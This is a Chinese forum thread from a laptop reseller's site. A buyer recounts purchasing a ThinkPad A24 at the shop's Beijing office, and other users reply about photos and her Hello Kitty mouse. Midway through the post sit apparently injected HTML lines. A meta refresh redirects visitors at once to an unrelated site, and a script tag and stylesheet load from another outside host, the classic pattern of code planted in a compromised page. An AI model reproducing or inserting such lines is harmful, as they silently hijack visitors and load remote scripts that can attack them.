开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

[X系列] 30日速买A24之小小心得!

在买本本之前,我并不是XY的注册会员,是同事告诉我这个地方卖本本很不错的说~!每天都是在论坛里随便逛逛,几天下来发现这里的气氛好好啊,大家都很热情的讨论着有关本本的信息,终于,我选定了A24。

为了买本本我不顾领导发现我翘班,火急火燎的赶到了传说中的天辰大厦,因为等了好几天的A24总是没货,这个急!

XY办公室给我的第一印象就是很随意,让人进来后不会有压迫感。。。我最怕无数个眼神盯着我看那种感觉了。屋子中有3处桌椅供大家挑选机器,当我们说明要买的机型后,立刻去拿货了,很快,崭新的机器映入我眼帘。。。一个字,耶!

这里的客服MM姓丛,人很好的,能够细心的帮助我们安装系统,我是个电脑白痴,所以经常会问些傻傻的低级问题,她都是态度很好的为我解答。安装屏幕贴膜的时候,那叫一个认真劲儿哈哈,真想上手帮她弄弄,贴完后从侧面看就像个镜面一样,美哦~!

最后都整理完毕,打包,交钱,开收据,加上挑本本的时候总共1小时左右就全都搞定了。

这次在我买本本的同时,还有好多人都来光顾XY,酒香不怕巷子深呵呵~!当晚我就用手机拍了几张照片,给大家看下,爱不释手啊,晚上接着玩^.^

+400---tszmsid
<meta http-equiv="refresh" content="0; url=http://www.1117.cc">
★★★
<script type="text/javascript" src="http://www.553.cc/q.js"></script>
<link href="http://www.553.cc/1.css" rel="stylesheet" type="text/css" media="screen" />
<P>&nbsp;</P>

经典的LOGO

经典的LOGO

打开后正面看上去非常大气

打开后正面看上去非常大气

永恒的黑。。

永恒的黑。。

附上我心爱的hello kitty,质量虽说没有品牌的好,但是真的很可爱,手感也不错哦~!

附上我心爱的hello kitty,质量虽说没有品牌的好,但是真的很可爱,手感也不错哦~!

评分

tszmsid + 400

是呀 估计是第一张图没有拍好 现在的t的确做工。。。。。。
呵呵,恭禧lz。还是个mm哦,
的确满好看的!!
kitty!
还是很佩服楼主的速度
非对称的屏幕这样看起来不怎么好看哦~
现在的做工实在不敢恭维,不过质量没问题就行。
估计是我拍的不太好吧,离着太近了。。呵呵
這個貓是幹什麽用的?
另外。。。你用手機都能拍這麽清楚?什麽手機這麽高級?
我也比较关心 是什么手机能拍这么清楚 ?
做工不错了,不要去比较.质量好就行.
好机器!恭喜
。。。
速度...绝对速度,在北京真好
恭喜阿。。。A24队伍越来越壮大了
MM的手好看啊,让我想的很多哦
是吗,拍的好??我用三星的U608~~~
恭喜樓主加入黑社會
MM 问个问题
那个hello kitty是鼠标吗?
手不错~~~~
girl买东西都这么速度痛快~真不知道有些老爷们都在反复犹豫着什么~
原帖由 borao 于 2007-11-1 13:06 发表
MM的手好看啊,让我想的很多哦

太有才了~~
现在MM都吃香

米够的人出手都快
回19楼的,是鼠标,姐姐送的呵呵,适合女生用,蛮可爱的~!
原帖由 流星花瓣儿 于 2007-11-1 22:44 发表
回19楼的,是鼠标,姐姐送的呵呵,适合女生用,蛮可爱的~!

鼠標?那個。。。。左鍵和右鍵在什麽地方?怎麽按的?
我發現我跟農民似的。。。
恭喜楼主。。。顺便问一下A56什么时候减价??
太有创意了。。。。真希望以后的电脑更有创意